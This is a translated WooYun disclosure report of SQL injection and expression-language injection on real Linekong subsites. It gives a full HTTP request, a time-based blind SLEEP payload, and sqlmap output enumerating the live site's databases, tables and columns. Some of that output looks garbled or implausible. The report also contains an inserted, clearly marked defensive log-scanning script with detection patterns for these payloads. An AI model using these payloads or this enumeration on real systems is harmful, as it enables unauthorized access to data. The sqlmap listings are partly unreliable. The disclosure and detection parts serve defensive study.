Vulnerability summary

Defect ID: wooyun-2015-0126333

Title: SQL injection on a Linekong (蓝港在线) subsite

Vendor: linekong.com

Author: Ysql404

Submitted: 2015-07-13 12:06

Fix time: 2015-07-18 12:08

Published: 2015-07-18 12:08

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor was notified but ignored the vulnerability

Source: http://www.wooyun.org; for questions or help, contact [email protected]


Vulnerability details

Disclosure status:

2015-07-13: Details sent to the vendor; awaiting vendor handling
2015-07-18: Vendor actively ignored the vulnerability; details disclosed to the public

Summary:

Time-based blind SQL injection on one Linekong subsite; expression language injection on another subsite

Detailed description:

1. Vulnerable URL: http://yt.linekong.com/lottery/panda/vote_xml.php

POST /lottery/panda/vote_xml.php?timeStame=1436664476447n9198 HTTP/1.1
Content-Length: 150
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://yt.linekong.com/
Host: yt.linekong.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
voteOption=6139&vote_id=80


Parameter: vote_id is injectable

POST parameter 'vote_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 3692 HTTP(s) requests:
---
Place: POST
Parameter: vote_id
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: voteOption=6139&vote_id=80'||(SELECT 'xWhr' FROM DUAL WHERE 4985=4985 AND SLEEP(5) )||'
---
[14:30:05] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.11


available databases [2]:
[*] `in`ormatiq\x0c_schemaA`
[*] yt_wgb


Database: yt_wgb
[22 tables]
+-------------------------+
| CPG_bridge |
| DEPARTMENT |
| Service |
| TBLTRANSACTIONS |
| admin_login |
| administer |
| administration |
| administrator |
| agent |
| akhbar |
| apartments |
| app_user |
| banned_users |
| binn_cform |
| cell_line |
| control |
| cv_countries |
| dtb_bat_order_daily_age |
| ipblocks |
| keyboards |
| nuke_autonews |
| spip_index_dico |
+-------------------------+


Database: yt_wgb
Table: admin_login
[60 columns]
+----------------------+-------------+
| Column | Type |
+----------------------+-------------+
| caroline-du-nord | numeric |
| adminemail | numeric |
| arch | numeric |
| area | numeric |
| attributecategory_id | numeric |
| ava_disciplina | numeric |
| bb_id | numeric |
| bijouxn | numeric |
| bio | numeric |
| bloc_id | numeric |
| cachename | numeric |
| child_cfg | numeric |
| clientno | numeric |
| de | numeric |
| desd_xforo | numeric |
| fichier | non-numeric |
| fldfunhref | numeric |
| fldfunid | numeric |
| fldfunmemo | numeric |
| fldfunname | numeric |
| former | numeric |
| id_article | numeric |
| id_breve | numeric |
| id_forum | numeric |
| id_message | numeric |
| id_page | numeric |
| id_rubrique | numeric |
| id_syndic | numeric |
| idmedicofamiglia | numeric |
| inv_id | numeric |
| job_title | numeric |
| k_id | numeric |
| lastposttime | numeric |
| liste | numeric |
| main_comment | numeric |
| medalid | numeric |
| mm | numeric |
| module_code | numeric |
| motto | numeric |
| nroordine | numeric |
| nt_id | numeric |
| our_loc | numeric |
| parent_id | numeric |
| payid | numeric |
| pluginhookid | numeric |
| pluginid | numeric |
| press | numeric |
| product_list | numeric |
| propertyno | numeric |
| publisher | numeric |
| recherche | numeric |
| subdivision_name | numeric |
| summaprihod | numeric |
| ticker | numeric |
| title_id | numeric |
| titre | numeric |
| totfasciaeuroid | numeric |
| utilisateurs | numeric |
| website | numeric |
| xfase | numeric |
+----------------------+-------------+


Database: yt_wgb
Table: administrator
[13 columns]
+----------------+---------+
| Column | Type |
+----------------+---------+
| group | numeric |
| account_number | numeric |
| codigo | numeric |
| essn | numeric |
| gab_pergunta | numeric |
| jml | numeric |
| maty_id | numeric |
| pass | numeric |
| user_pass | numeric |
| userid | numeric |
| utilizzatore | numeric |
| word | numeric |
| xprognostico | numeric |
+----------------+---------+


Database: yt_wgb
Table: app_user
[50 columns]
+-------------------------+---------+
| Column | Type |
+-------------------------+---------+
| am_id | numeric |
| an | numeric |
| at_id | numeric |
| ba_num_reads | numeric |
| bfs_id | numeric |
| blogcommentsaccess | numeric |
| blogcommentssub | numeric |
| bml_id | numeric |
| bms_cat_id | numeric |
| bs_setting | numeric |
| campo_bol | numeric |
| codeid | numeric |
| contacts | numeric |
| cost_id | numeric |
| dis_codigo | numeric |
| distip | numeric |
| field3 | numeric |
| fjalekalimin | numeric |
| gmail | numeric |
| grfilt | numeric |
| hdesc | numeric |
| id_photo | numeric |
| idclassificatore | numeric |
| idgroup | numeric |
| manufacturer | numeric |
| message | numeric |
| mod_date | numeric |
| mod_flipper_img_rotator | numeric |
| mod_jt_slideshow | numeric |
| noteaccettazione | numeric |
| nrcandi | numeric |
| ostdate | numeric |
| pasword | numeric |
| perid | numeric |
| prepend_digits | numeric |
| progetto | numeric |
| prz_merce | numeric |
| sb_pwd | numeric |
| sd | numeric |
| sender | numeric |
| sklad | numeric |
| smilie_id | numeric |
| solicitante_id | numeric |
| t1 | numeric |
| t2 | numeric |
| tanggal | numeric |
| tenquanly | numeric |
| term_id | numeric |
| top | numeric |
| us_id | numeric |
+-------------------------+---------+


2. http://kefu.linekong.com/eService/system/inputLogin.do?gameId=10&gameMainId=${100167-11126}
The gameMainId parameter is vulnerable to expression language injection, which can leak sensitive information; this was reported before and was not fully fixed.
See: WooYun: Expression language injection and remote command execution on a Linekong subsite
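A defender-side illustration of the two indicators in this report, added here as an example and not part of the original report or of Linekong's code: it scans constructed access-log records for the time-based blind pattern (SLEEP or BENCHMARK inside a parameter value) and for expression-language probes (`${...}` or `#{...}`), and for `SLEEP(n)` cross-checks whether the observed response latency actually reached n seconds, which separates a confirmed injection from a benign string that merely contains the word. The `Request` fields, the sample records and their durations are constructed for this example; the paths and parameter names echo the report.

```python
"""Constructed detection example for the indicators shown in this report:
time-based blind SQL injection payloads and expression-language probes."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Time-based blind SQL injection indicators (MySQL SLEEP / BENCHMARK).
SLEEP_RE = re.compile(r"\bSLEEP\s*\(\s*(\d+)\s*\)", re.IGNORECASE)
BENCHMARK_RE = re.compile(r"\bBENCHMARK\s*\(", re.IGNORECASE)
# Expression-language probe such as gameMainId=${100167-11126}.
EL_RE = re.compile(r"[$#]\{[^}]*\}")


@dataclass
class Request:
    """One access-log record; the field set is an assumption of this example."""
    method: str
    url: str            # path plus query string
    body: str           # raw form body, empty for GET
    duration_ms: int    # server-side response time


@dataclass
class Finding:
    kind: str                           # "sqli-time-based" or "el-injection"
    param: str
    value: str
    latency_confirmed: Optional[bool]   # only set for SLEEP(n) payloads


def _params(req: Request) -> List[Tuple[str, str]]:
    """All name/value pairs from the query string and the body, URL-decoded."""
    pairs = parse_qsl(urlsplit(req.url).query, keep_blank_values=True)
    if req.body:
        pairs += parse_qsl(req.body, keep_blank_values=True)
    # Decode a second time: scanners frequently double-encode payloads.
    return [(k, unquote_plus(v)) for k, v in pairs]


def inspect(req: Request) -> List[Finding]:
    """Return every suspicious parameter in one request."""
    findings: List[Finding] = []
    for name, value in _params(req):
        m = SLEEP_RE.search(value)
        if m or BENCHMARK_RE.search(value):
            confirmed = None
            if m:
                # A real time-based blind hit stalls the handler for roughly
                # the requested number of seconds; correlate with latency so
                # that a benign "sleep(5)" in a search box is not confirmed.
                confirmed = req.duration_ms >= int(m.group(1)) * 1000
            findings.append(Finding("sqli-time-based", name, value, confirmed))
        if EL_RE.search(value):
            findings.append(Finding("el-injection", name, value, None))
    return findings


def scan(records: List[Request]) -> List[Finding]:
    """Run inspect() over a batch of records and flatten the results."""
    return [f for r in records for f in inspect(r)]


# Constructed sample records (not real log lines from the report).
SAMPLE_LOG = [
    Request("POST", "/lottery/panda/vote_xml.php?timeStame=1436664476447n9198",
            "voteOption=6139&vote_id=80", 120),
    Request("POST", "/lottery/panda/vote_xml.php?timeStame=1436664476447n9198",
            "voteOption=6139&vote_id=80'||(SELECT 'xWhr' FROM DUAL WHERE 4985=4985 AND SLEEP(5) )||'",
            5230),
    Request("GET", "/eService/system/inputLogin.do?gameId=10&gameMainId=${100167-11126}", "", 95),
    Request("GET", "/search?q=how+to+sleep(5)+hours", "", 40),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.kind:16} param={f.param!r} latency_confirmed={f.latency_confirmed} value={f.value!r}")
```

The latency cross-check is the part worth keeping in a production rule: a `SLEEP(5)` string in a parameter is a scanner fingerprint, but a `SLEEP(5)` string followed by a five-second response is evidence that the query actually executed it, which is exactly what sqlmap's "AND time-based blind" technique relies on.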

Proof of vulnerability:

(Same sqlmap output and second issue as listed under the detailed description above.)

Fix recommendation:

Dumping the data was too slow, so I did not test further.

Copyright notice: please credit the source when reposting, Ysql404@WooYun


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored on: 2015-07-18 12:08

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None